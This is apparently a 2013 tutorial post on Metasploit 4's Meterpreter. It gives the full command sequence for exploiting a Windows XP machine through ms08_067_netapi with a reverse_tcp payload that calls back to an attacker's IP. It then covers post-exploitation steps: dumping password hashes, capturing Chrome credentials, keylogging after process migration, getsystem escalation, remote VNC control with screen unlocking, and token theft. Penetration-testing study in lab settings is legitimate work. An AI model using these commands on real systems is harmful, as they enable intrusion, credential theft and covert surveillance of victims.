9/11/2013

Metasploit 4

Metasploit 4


Meterpreter part 1

What is meterpreter ?

Meterpreter is payload that uses DLL injection technique in memory so ,
Antiviruses software can't detect it because meterpreter writes nothing to disk
Meterpreter uses encrypted communications.

Now let's try to hack windows machine (Windows XP) and set Meterpreter as a payload 


First we will use ms08_067_netapi exploit
use exploit/windows/smb/ms08_067_netapi


Then we set the remote host (victim)
set RHOST 192.168.0.227

Then we set meterpreter as a payload
set PAYLOAD windows/meterpreter/reverse_tcp


we set the IP address of the local machine (attacker) so that meterpreter can connect back to the attacker machine

set LHOST 192.168.0.229


Then ...

exploit



Excellent

The exploit (ms08_067_netapi) succeed and the remote machine (victim) connecting back to the local machine (attacker) 
Now we have a Meterpreter session open 

Let's explore some basic Meterpreter commands:

1- sysinfo
collect information about the system



2- screenshot
capturing the current desktop


3- hashdump
Dumping the password hash



Note: Meterpreter containe many of scripts such as (vnc, winenum , chrome_enum, killav ...)
To run a scripr run script_name for exmple(run chrome_enum) to capture chrome credentials
To list all meterpreter scripts jsu type run and hit tab twice


4- keystrokes
keystroke is Keyboard Capturing software, keystroke records the keys struck on a keyboard.


A- migrate to explorer
First we use ps command to view all process on the remote machine to get the PID of explorer process (explorer PID = 1432)
Then we do migration
what is migrate ?
To migrate meterpreter session from one process to another to avoid loosing the session if the process is killed

migrate 1432


B- run keylog_recorder


Note : the output file is located in "/root/.msf4/logs/scripts/keylogrecorder/192.168.0.227_20130820.5859.txt"

Now on windows try to type on keyboard
ping 192.168.0.229 then CTRL+C


C- To interrupt keystroker hit CTRL+C

now let's view the dumped file
cat /root/.msf4/logs/scripts/keylogrecorder/192.168.0.227_20130820.5859.txt


As expected

5-Privilege Escalation

To get system as admin user (Full access full privilege)

A- Load priv extension 
use priv

B- To get system as admin 
getsystem

C- To verify the admin privilege
getuid


6- VNC

VNC(Virtual Network Computing) is a remote control desktop software 

To install VNC on the remote machine
run vnc




To unlock the remote screen
run screen_unlock


7- Token impersonation

How to impersonate user tokens to allow you to access to system or network without having to provide credentials.

There are two types of tokens
1- delegate : For interactive logons suck as (remote desktop and machine logging)
2- impersonate : For non-interactive logons such as domain logon

To do so you have to load incognito extension

use incognito

Then to list the tokens available
list_tokens -u



To get the tokens of SYSTEM
impersonate_token "NT AUTHORITY\\SYSTEM"



Now we currently running as SYSTEM (Full access)


OR

use ps command to list all running processes , Then you can steal the token of the owner of any process

A- ps



Now if i want to run as Administrator (owner of the process wuauctl.exe) PID = 1528 OR for sure  any other process that owned by Administrator

B- steal_token 1528